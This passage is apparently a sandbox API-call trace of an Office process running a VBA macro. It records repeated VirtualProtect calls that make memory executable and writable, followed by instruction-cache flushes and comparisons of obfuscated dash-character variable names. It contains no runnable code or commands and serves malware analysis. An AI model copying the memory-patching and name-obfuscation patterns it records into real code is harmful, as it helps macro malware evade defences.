lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.534] GetCurrentProcess () returned 0xffffffff [0104.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0104.534] GetCurrentProcess () returned 0xffffffff [0104.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0104.534] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.534] GetCurrentProcess () returned 0xffffffff [0104.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0104.534] GetCurrentProcess () returned 0xffffffff [0104.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0104.534] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.535] GetCurrentProcess () returned 0xffffffff [0104.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0104.535] GetCurrentProcess () returned 0xffffffff [0104.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0104.535] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.536] GetCurrentProcess () returned 0xffffffff [0104.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0104.536] GetCurrentProcess () returned 0xffffffff [0104.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0104.536] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.536] GetCurrentProcess () returned 0xffffffff [0104.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0104.537] GetCurrentProcess () returned 0xffffffff [0104.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0104.537] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.537] GetCurrentProcess () returned 0xffffffff [0104.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0104.537] GetCurrentProcess () returned 0xffffffff [0104.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0104.537] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.538] GetCurrentProcess () returned 0xffffffff [0104.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0104.538] GetCurrentProcess () returned 0xffffffff [0104.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0104.538] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.539] GetCurrentProcess () returned 0xffffffff [0104.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0104.539] GetCurrentProcess () returned 0xffffffff [0104.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0104.539] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.539] GetCurrentProcess () returned 0xffffffff [0104.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0104.539] GetCurrentProcess () returned 0xffffffff [0104.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0104.539] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.540] GetCurrentProcess () returned 0xffffffff [0104.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0104.540] GetCurrentProcess () returned 0xffffffff [0104.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0104.540] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.541] GetCurrentProcess () returned 0xffffffff [0104.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0104.541] GetCurrentProcess () returned 0xffffffff [0104.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0104.541] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.541] GetCurrentProcess () returned 0xffffffff [0104.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0104.541] GetCurrentProcess () returned 0xffffffff [0104.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0104.542] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.542] GetCurrentProcess () returned 0xffffffff [0104.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0104.543] GetCurrentProcess () returned 0xffffffff [0104.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0104.543] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.543] GetCurrentProcess () returned 0xffffffff [0104.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0104.543] GetCurrentProcess () returned 0xffffffff [0104.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0104.543] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.544] GetCurrentProcess () returned 0xffffffff [0104.544] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0104.544] GetCurrentProcess () returned 0xffffffff [0104.544] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0104.544] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.544] GetCurrentProcess () returned 0xffffffff [0104.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0104.545] GetCurrentProcess () returned 0xffffffff [0104.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0104.545] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.545] GetCurrentProcess () returned 0xffffffff [0104.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0104.545] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.545] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0104.545] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0104.546] SetErrorMode (uMode=0x8001) returned 0x8001 [0104.546] GetProcAddress (hModule=0x693e0000, lpProcName=0x256) returned 0x693e74be [0104.547] GetAsyncKeyState (vKey=3) returned 0 [0104.548] GetAsyncKeyState (vKey=3) returned 0 [0104.548] CRetailMalloc_Alloc () returned 0x630678 [0104.548] memcpy (in: _Dst=0xb2a5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.548] memcpy (in: _Dst=0xb2a5270, _Src=0x1977e4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0104.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82f72, cbMultiByte=6, lpWideCharStr=0x1975e4, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0104.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302bee, cbMultiByte=6, lpWideCharStr=0x197644, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0104.549] memcpy (in: _Dst=0xb2a5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.549] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount2=-1) returned 1 [0104.549] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0104.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82f96, cbMultiByte=24, lpWideCharStr=0x1975e4, cchWideChar=25 | out: lpWideCharStr="–—–——–—–——––—–—––—–—––—") returned 24 [0104.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302bba, cbMultiByte=24, lpWideCharStr=0x197644, cchWideChar=25 | out: lpWideCharStr="–—–——–—–——––—–—––—–—––—") returned 24 [0104.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302bba, cbMultiByte=24, lpWideCharStr=0x197644, cchWideChar=25 | out: lpWideCharStr="–—–——–—–——––—–—––—–—––—") returned 24 [0104.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302bba, cbMultiByte=24, lpWideCharStr=0x197644, cchWideChar=25 | out: lpWideCharStr="–—–——–—–——––—–—––—–—––—") returned 24 [0104.550] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount2=-1) returned 1 [0104.550] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0104.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302bba, cbMultiByte=24, lpWideCharStr=0x197644, cchWideChar=25 | out: lpWideCharStr="–—–——–—–——––—–—––—–—––—") returned 24 [0104.551] CRetailMalloc_Alloc () returned 0xf4f4058 [0104.551] _mbscpy_s (in: _Dst=0xf4f4058, _DstSizeInBytes=0x18, _Src=0x11302bba | out: _Dst=0xf4f4058) returned 0x0 [0104.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40d1a, cbMultiByte=31, lpWideCharStr=0x197654, cchWideChar=32 | out: lpWideCharStr="_B_var_–—–——–—–——––—–—––—–—––—") returned 31 [0104.551] _mbscpy_s (in: _Dst=0x1976bc, _DstSizeInBytes=0x18, _Src=0x11302bba | out: _Dst=0x1976bc) returned 0x0 [0104.551] CRetailMalloc_Free () returned 0x1 [0104.551] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0104.551] memcpy (in: _Dst=0xb2a5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.551] memcpy (in: _Dst=0xb2a5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.551] memcpy (in: _Dst=0xb2a5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.551] memcpy (in: _Dst=0xb2a5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.552] memcpy (in: _Dst=0xb2a5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.552] memcpy (in: _Dst=0xb2a5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0104.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0104.552] memcpy (in: _Dst=0x6306ec, _Src=0x197864, _Size=0x18 | out: _Dst=0x6306ec) returned 0x6306ec [0104.552] CRetailMalloc_Realloc () returned 0x630678 [0104.552] CRetailMalloc_Free () returned 0x1 [0104.552] GetCurrentProcess () returned 0xffffffff [0104.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0104.552] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.553] GetCurrentProcess () returned 0xffffffff [0104.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0104.553] GetCurrentProcess () returned 0xffffffff [0104.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0104.553] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.554] GetCurrentProcess () returned 0xffffffff [0104.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0104.554] GetCurrentProcess () returned 0xffffffff [0104.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0104.554] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.555] GetCurrentProcess () returned 0xffffffff [0104.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0104.555] GetCurrentProcess () returned 0xffffffff [0104.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0104.555] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.555] GetCurrentProcess () returned 0xffffffff [0104.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0104.555] GetCurrentProcess () returned 0xffffffff [0104.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0104.556] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.556] GetCurrentProcess () returned 0xffffffff [0104.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0104.556] GetCurrentProcess () returned 0xffffffff [0104.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0104.556] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.557] GetCurrentProcess () returned 0xffffffff [0104.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0104.557] GetCurrentProcess () returned 0xffffffff [0104.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0104.557] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.558] GetCurrentProcess () returned 0xffffffff [0104.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0104.558] GetCurrentProcess () returned 0xffffffff [0104.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0104.558] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.559] GetCurrentProcess () returned 0xffffffff [0104.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0104.559] GetCurrentProcess () returned 0xffffffff [0104.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0104.559] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.560] GetCurrentProcess () returned 0xffffffff [0104.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0104.560] GetCurrentProcess () returned 0xffffffff [0104.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0104.560] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.560] GetCurrentProcess () returned 0xffffffff [0104.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0104.561] GetCurrentProcess () returned 0xffffffff [0104.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0104.561] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.561] GetCurrentProcess () returned 0xffffffff [0104.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0104.561] GetCurrentProcess () returned 0xffffffff [0104.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0104.561] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.562] GetCurrentProcess () returned 0xffffffff [0104.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0104.562] GetCurrentProcess () returned 0xffffffff [0104.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0104.562] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.563] GetCurrentProcess () returned 0xffffffff [0104.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0104.563] GetCurrentProcess () returned 0xffffffff [0104.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0104.563] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.563] GetCurrentProcess () returned 0xffffffff [0104.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0104.563] GetCurrentProcess () returned 0xffffffff [0104.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0104.563] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.564] GetCurrentProcess () returned 0xffffffff [0104.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0104.564] GetCurrentProcess () returned 0xffffffff [0104.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0104.564] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.565] GetCurrentProcess () returned 0xffffffff [0104.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0104.565] GetCurrentProcess () returned 0xffffffff [0104.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0104.565] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.565] GetCurrentProcess () returned 0xffffffff [0104.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0104.565] GetCurrentProcess () returned 0xffffffff [0104.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0104.565] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.566] GetCurrentProcess () returned 0xffffffff [0104.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0104.566] GetCurrentProcess () returned 0xffffffff [0104.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0104.566] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.567] GetCurrentProcess () returned 0xffffffff [0104.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0104.567] GetCurrentProcess () returned 0xffffffff [0104.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0104.567] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.567] GetCurrentProcess () returned 0xffffffff [0104.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0104.567] GetCurrentProcess () returned 0xffffffff [0104.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0104.567] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.568] GetCurrentProcess () returned 0xffffffff [0104.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0104.568] GetCurrentProcess () returned 0xffffffff [0104.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0104.568] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.569] GetCurrentProcess () returned 0xffffffff [0104.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0104.569] GetCurrentProcess () returned 0xffffffff [0104.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0104.569] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.570] GetCurrentProcess () returned 0xffffffff [0104.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0104.570] GetCurrentProcess () returned 0xffffffff [0104.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0104.570] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.570] GetCurrentProcess () returned 0xffffffff [0104.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0104.570] GetCurrentProcess () returned 0xffffffff [0104.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0104.570] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.571] GetCurrentProcess () returned 0xffffffff [0104.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0104.571] GetCurrentProcess () returned 0xffffffff [0104.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0104.571] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.572] GetCurrentProcess () returned 0xffffffff [0104.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0104.572] GetCurrentProcess () returned 0xffffffff [0104.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0104.572] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.572] GetCurrentProcess () returned 0xffffffff [0104.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0104.572] GetCurrentProcess () returned 0xffffffff [0104.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0104.573] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0104.624] GetCurrentProcess () returned 0xffffffff [0104.624] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0104.624] GetCurrentProcess () returned 0xffffffff [0104.624] 